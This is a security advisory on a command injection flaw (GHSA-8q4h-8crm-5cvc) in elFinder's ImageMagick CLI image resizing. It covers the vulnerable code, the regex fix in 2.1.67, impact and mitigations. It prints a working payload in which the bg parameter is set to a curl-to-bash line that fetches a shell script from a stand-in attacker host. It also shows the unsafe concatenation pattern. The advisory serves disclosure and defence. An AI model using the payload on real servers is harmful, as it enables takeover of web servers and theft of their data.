GHSA-8q4h-8crm-5cvc: Remote Command Execution via Command Injection in elFinder ImageMagick CLI Integration

elFinder is a widely deployed open-source file manager for web applications, providing a user interface and a backend connector for file operations. The application supports various image processing engines to handle tasks such as resizing and cropping. Administrators can configure elFinder to use the ImageMagick command-line interface as the underlying processor when native PHP extensions are unavailable. This specific configuration exposes an attack surface within the image manipulation endpoints.

The vulnerability, tracked as GHSA-8q4h-8crm-5cvc, constitutes an Improper Neutralization of Special Elements used in a Command (CWE-77). It specifically manifests in the handling of the background color parameter during image resize or rotation operations. The application routes this parameter directly into system-level execution contexts without sanitization. This architectural decision creates a direct conduit between external HTTP requests and the underlying operating system shell.

Successful exploitation results in arbitrary command execution on the host server. The injected commands execute under the privilege context of the web server process handling the elFinder requests. This level of access permits complete compromise of the web application, exfiltration of sensitive configuration data, and establishes a foothold for further lateral movement within the network.

The fundamental flaw resides within the _imgResize method located in the elFinderVolumeDriver.class.php file. This method is responsible for applying transformations to images, such as adjusting dimensions or rotating the image by specific degrees. When a rotation or padding operation requires a background fill, the method accepts a user-controlled bg (background color) parameter to define the fill color.

In vulnerable versions of the application, the elFinderVolumeDriver constructs a system command string to invoke the ImageMagick utilities, specifically convert or mogrify. The application concatenates the bg parameter directly into this string arguments. The PHP script then passes the fully constructed string to native shell execution functions such as exec() or system().

The absence of input neutralization allows shell metacharacters to alter the execution logic of the resulting command. The application expects a string representing a color, such as white or #FFFFFF. However, an attacker can supply shell operators like semicolons, ampersands, or command substitution constructs. The underlying operating system shell interprets these metacharacters as instruction boundaries, executing the attacker's arbitrary commands alongside the intended ImageMagick invocation.

The vulnerability manifests where the application prepares the command arguments for ImageMagick. The application takes the input parameter and directly embeds it into the shell command structure. This pattern demonstrates the danger of relying on string concatenation for command construction instead of using parameterized execution APIs.

// Vulnerable Code Pattern (Conceptual)
// The unsanitized $bg parameter is directly concatenated
$cmd = "convert input.jpg -rotate $degree -background $bg output.jpg";
exec($cmd);

The maintainers addressed this vulnerability in version 2.1.67 by implementing strict input validation on the $bg parameter. Rather than attempting to escape shell characters, which is prone to bypasses, the patch uses an allowlist approach. The application now enforces a strict regular expression against the input value before it can be used in the command construction.

// Patched Code Validation
// Input is validated against a strict regex before use
if (!preg_match('/^(#[0-9a-f]{3,6}|transparent)$/i', $bg)) {
    return false; // Reject the input
}

The fix is complete and highly effective for this specific parameter. The regex preg_match('/^(#[0-9a-f]{3,6}|transparent)$/i', $bg) ensures the background color can only consist of a valid hexadecimal color code or the exact string transparent. The use of the start ^ and end $ anchors is critical, as it prevents attackers from prepending or appending shell commands to an otherwise valid color code. This effectively closes the injection vector.

Exploitation requires the attacker to identify an elFinder instance configured to use the ImageMagick CLI driver. This configuration is standard in environments lacking the PHP imagick or gd extensions. The attacker initiates the attack by interacting with the elFinder UI or API to trigger an image transformation operation, such as rotating an uploaded image.

The attacker intercepts the HTTP request and modifies the bg parameter. The payload must begin with a syntactically valid shell separator to terminate the convert command arguments, followed by the arbitrary system command. A common injection pattern utilizes the semicolon character to chain commands sequentially.

A specific payload example takes the form of white; curl http://attacker.com/shell.sh | bash; #. When processed by the vulnerable application, the resulting shell string becomes convert input.jpg -rotate 90 -background white; curl http://attacker.com/shell.sh | bash; # output.jpg.

The operating system executes convert, immediately followed by the execution of the curl command. The trailing # acts as a comment character, neutralizing the remainder of the original command string and preventing syntax errors that might interrupt the shell execution. The payload successfully achieves arbitrary code execution without triggering application-level errors.

The vulnerability carries a critical severity rating, evidenced by a CVSS base score of 9.8. This score reflects the low attack complexity, the lack of required privileges, and the network-based attack vector. Any user capable of reaching the elFinder connector endpoint can exploit this flaw, provided the underlying ImageMagick CLI configuration is active.

Successful exploitation grants the attacker full command execution capabilities within the context of the web application. The attacker operates with the permissions of the web server service account, typically www-data or apache. This access permits the reading of sensitive configuration files, including database credentials and application secrets stored locally on the server.

The blast radius extends beyond data theft to include complete system compromise. Attackers can deploy persistent backdoors, install ransomware, or use the compromised web server as a staging point for attacks against the internal network. The severity is contingent entirely on the environment's reliance on the ImageMagick CLI; deployments utilizing PHP GD or the native PHP Imagick extension are not susceptible to this specific execution path.

The primary remediation strategy requires upgrading the studio-42/elfinder package to version 2.1.67 or later. Administrators managing elFinder via Composer should update their dependency specifications and run the update command to pull the patched version. Verifying the installation involves confirming the regex validation exists within the elFinderVolumeDriver.class.php file.

If immediate patching is unfeasible, administrators must disable the ImageMagick CLI driver within the elFinder configuration. The application should be reconfigured to utilize the PHP GD extension or the PHP Imagick extension. These native extensions process images through shared libraries and APIs, entirely avoiding the generation of system shell commands and neutralizing the command injection vector.

At the network edge, security teams should implement Web Application Firewall (WAF) rules to inspect traffic destined for the elFinder connector endpoint. The WAF policy must enforce strict input validation on the bg query parameter, blocking requests that contain shell metacharacters such as semicolons, pipes, ampersands, or backticks. This defensive layer provides compensating controls while the underlying application is scheduled for patching.